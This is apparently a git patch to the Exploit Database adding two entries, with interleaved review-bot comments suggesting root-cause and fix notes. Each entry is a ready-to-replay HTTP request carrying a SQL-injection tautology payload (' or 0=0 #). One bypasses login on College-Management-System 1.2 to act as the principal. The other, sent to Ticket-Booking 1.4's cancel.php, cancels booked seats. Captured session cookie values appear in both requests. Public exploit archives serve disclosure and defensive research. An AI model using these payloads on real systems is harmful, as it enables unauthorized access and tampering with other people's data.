From a6db0c9d902e3540598cb22bd054b7dcd5db87b8 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sun, 15 Sep 2019 05:02:26 +0000 Subject: [PATCH] DB: 2019-09-15 2 changes to exploits/shellcodes Ticket-Booking 1.4 - Authentication Bypass College-Management-System 1.2 - Authentication Bypass --- exploits/php/webapps/47387.txt | 30 ++++++++++++++++++++++++++++++ exploits/php/webapps/47388.txt | 31 +++++++++++++++++++++++++++++++ files_exploits.csv | 2 ++ 3 files changed, 63 insertions(+) create mode 100644 exploits/php/webapps/47387.txt create mode 100644 exploits/php/webapps/47388.txt
diff --git a/exploits/php/webapps/47387.txt b/exploits/php/webapps/47387.txt
new file mode 100644
index 000000000..2bd0448ff
--- /dev/null
+++ b/exploits/php/webapps/47387.txt
@@ -0,0 +1,30 @@
+# Exploit Title: Ticket-Booking 1.4 - Authentication Bypass
+# Author: Cakes
+# Discovery Date: 2019-09-14
+# Vendor Homepage: https://github.com/ABHIJEET-MUNESHWAR/Ticket-Booking
+# Software Link: https://github.com/ABHIJEET-MUNESHWAR/Ticket-Booking/archive/master.zip
+# Tested Version: 1.4
+# Tested on OS: CentOS 7
+# CVE: N/A
+
+# Description:
+# Easy authentication bypass vulnerability on this ticket booking application
+# allowing the attacker to remove any previously booked seats
+
+# Simply replay the below Burp request or use Curl (remember to change the Cookie Values)
+
+POST /ticket/cancel.php HTTP/1.1
+Host: Target
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://Target/ticket/login.php
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 50
+Cookie: PHPSESSID=j9jrgserbga22a9q9u165uirh4; rental_property_manager=mq5iitk8ic80ffa8dcf28294d4
+Connection: close
+Upgrade-Insecure-Requests: 1
+DNT: 1
+
+userid='%20or%200%3d0%20#&password=123&save=signin
\ No newline at end of file
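Review bot: The header block of 47387.txt labels the issue an authentication bypass but never names the root cause, which from the quote-and-tautology value sent in `userid` looks like SQL injection in the query behind `/ticket/cancel.php`; the vendor source is not part of this patch, so that is inferred. A reader triaging the entry would want a line such as `# Root cause: 'userid' appears to reach a SQL query unsanitised (SQL injection, CWE-89)` and one such as `# Fix: use prepared statements and require a valid logged-in session in cancel.php`. The same two lines are missing from 47388.txt (parameter `emailid`, `/college/principalcheck.php`). Separately, the `Cookie:` header in both files carries what look like captured session values; placeholders such as `PHPSESSID=<session-id>` would keep test-environment data out of the archive.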
diff --git a/exploits/php/webapps/47388.txt b/exploits/php/webapps/47388.txt
new file mode 100644
index 000000000..384acbbcc
--- /dev/null
+++ b/exploits/php/webapps/47388.txt
@@ -0,0 +1,31 @@
+# Exploit Title: College-Management-System 1.2 - Authentication Bypass
+# Author: Cakes
+# Discovery Date: 2019-09-14
+# Vendor Homepage: https://github.com/ajinkyabodade/College-Management-System
+# Software Link: https://github.com/ajinkyabodade/College-Management-System/archive/master.zip
+# Tested Version: 1.2
+# Tested on OS: CentOS 7
+# CVE: N/A
+
+# Discription:
+# Easy authentication bypass vulnerability on the application
+# allowing the attacker to log in as the school principal.
+
+# Simply replay the below Burp request or use Curl.
+# Payload: ' or 0=0 #
+
+POST /college/principalcheck.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://TARGET/college/principalcheck.php
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 36
+Cookie: PHPSESSID=9bcu5lvfilimmvfnkinqlc61l9; Logmon=ca43r5mknahus9nu20jl9qca0q
+Connection: close
+Upgrade-Insecure-Requests: 1
+DNT: 1
+
+emailid='%20or%200%3d0%20#&pass=asdf
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index ccf4e31f6..01789f21a 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
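Review bot: `# Discription:` in the header block of 47388.txt is misspelled and should read `# Description:`, as 47387.txt has it; any tooling that reads these header fields by name would likely miss the entry otherwise. The `# Payload:` comment shows the value decoded while the request body carries it URL-encoded, so a short remark that both forms are the same value would help anyone matching it against web-server or WAF logs.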
@@ -41732,3 +41732,5 @@ id,file,description,date,author,type,platform,port
 47384,exploits/php/webapps/47384.txt,"Dolibarr ERP-CRM 10.0.1 - 'User-Agent' Cross-Site Scripting",2019-09-13,"Metin Yunus Kandemir",webapps,php,
 47385,exploits/php/webapps/47385.txt,"phpMyAdmin 4.9.0.1 - Cross-Site Request Forgery",2019-09-13,"Manuel García Cárdenas",webapps,php,80
 47386,exploits/php/webapps/47386.txt,"LimeSurvey 3.17.13 - Cross-Site Scripting",2019-09-13,"SEC Consult",webapps,php,80
+47387,exploits/php/webapps/47387.txt,"Ticket-Booking 1.4 - Authentication Bypass",2019-09-14,cakes,webapps,php,
+47388,exploits/php/webapps/47388.txt,"College-Management-System 1.2 - Authentication Bypass",2019-09-14,cakes,webapps,php,